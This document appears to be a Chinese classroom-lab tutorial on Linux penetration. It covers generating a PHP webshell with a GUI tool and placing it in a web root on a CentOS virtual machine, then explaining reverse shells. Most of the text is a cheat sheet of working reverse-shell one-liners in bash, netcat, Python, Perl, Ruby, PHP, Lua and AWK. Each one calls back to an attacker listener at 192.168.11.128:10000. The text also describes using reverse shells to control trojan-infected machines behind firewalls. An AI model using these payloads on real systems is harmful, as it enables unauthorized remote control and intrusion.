Linux简单渗透、反弹shell、常见脚本反弹方法

Linux简单渗透

这是我在课堂上做的一个小实验，首先电脑要有Java软件，没有去电脑管家下载一个，用于后期渗透。

第一步：打开软件点击管理，会出现让我们生成的界面，密码、密钥可以改，自己记住就行，这里我用的默认，有效载荷更具自己需求更改，这里我用的php，然后点击生成。

 第二步：点击生成后会让我们选择一个存放文件地址，更具自己想放那放那，然后会在存放文件里生成一个php文件，右击我们用notepad++（这里我用的是notepad++）打开可以看到文件里的内容。

 第三步：把刚才创好的php文件移动到我们的虚拟机（这里我用的centos，我用的FinalShell把php移到虚拟机里），我们需要将php文件移动到/var/www/html/这个目录下。

 第四步：去网页访问自己的虚拟IP地址加端口号（端口号看自己的端口是多少，默认是80，端口号后面加刚才我们命名的那个php文件），访问之后页面是全白就对了，啥都没有。

 第五步：点击目标添加，自己需要改的更具下面图片去修改相应的内容。

 第六步：修改完成后我们先点击测试连接，看是否会成功连接，如果连接成功我们在点添加。（左边是连接成功的提示；右边是添加成功的提示）。

 第七步：添加成功后会出现下面的一行内容。

 第八步：我们右击这一行内容，然后点进入，如果出现下面界面，说明我们已经渗透成功了

 补充：连接云服务器（这里我没有云服务器，所以访问centos，成功进入）

 

什么是反弹shell？

反弹shell（reverse shell），就是控制端监听在某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。reverse shell与telnet，ssh等标准shell对应，本质上是网络概念的客户端与服务端的角色反转。

为什么要反弹shell？

通常用于被控端因防火墙受限、权限不足、端口被占用等情形。

举例：假设我们攻击了一台机器，打开了该机器的一个端口，攻击者在自己的机器去连接目标机器（目标ip：目标机器端口），这是比较常规的形式，我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。那么什么情况下正向连接不能用了呢？

有如下情况：

1. 某客户机中了你的网马，但是它在局域网内，你直接连接不了。
2. 目标机器的ip动态改变，你不能持续控制。
3. 由于防火墙等限制，对方机器只能发送请求，不能接收请求。
4. 对于病毒，木马，受害者什么时候能中招，对方的网络环境是什么样的，什么时候开关机等情况都是未知的，所以建立一个服务端让恶意程序主动连接，才是上策。

那么反弹就很好理解了，攻击者指定服务端，受害者主机主动连接攻击者的服务端程序，就叫反弹连接。

0x01.bash

在攻击主机上执行端口监听：nc -lvvp port     //port 为攻击主机端口号，并且此端口号没有被占用

在目标主机上执行：bash -i >& /dev/tcp/攻击主机ip/port 0>&1             //port 为攻击主机端口号

nc -lvvp port（10000）      //kali 上执行这条命令

bash -i >& /dev/tcp/攻击主机ip/10000 0>&1   //centos 上执行这条命令

 反弹成功会出现上面情况，当输入ifconfig/whoami会出现被攻击的信息

0x02.nc（netcat）反弹

在攻击主机上执行端口监听：nc -lvvp port       //port 为攻击主机端口号，并且此端口号没有被占用

在目标主机上执行：nc -e /bin/bash 攻击主机ip port

nc -lvvp 10000   //kali上执行

nc -e /bin/bash 192.168.11.128 10000   //centsos上执行

常见脚本反弹

以上脚本是在目标主机上执行，其中 x.x.x.x 均为攻击主机ip，并且需要提前在攻击主机上进行监听相关端口,接下来就不再赘述

1.python

nc -lvvp 10000

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.11.128",10000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

2.perl

nc -lvvp 10000

perl -e '
use Socket;
$i="192.168.11.128";
$p=10000;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
open(STDOUT,">&S");open(STDERR,">&S");
exec("/bin/sh -i");};'

3.Ruby

nc -lvvp 10000

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.11.128","10000");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

4.PHP

nc -lvvp 10000

php -r '$sock=fsockopen("192.168.11.128",10000);exec("/bin/bash -i <&3 >&3 2>&3");'

5.Lua

（这个不一定成功）
nc -lvvp 10000
lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.11.128','10000');os.execute('/bin/sh -i <&3 >&3 2>&3');"

6.AWK反弹

攻击的机器监听，在收到shell的时候不可以输入enter，不然会断开

nc -lvvp 10000

awk 'BEGIN{s="/inet/tcp/0/192.168.11.128/10000";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'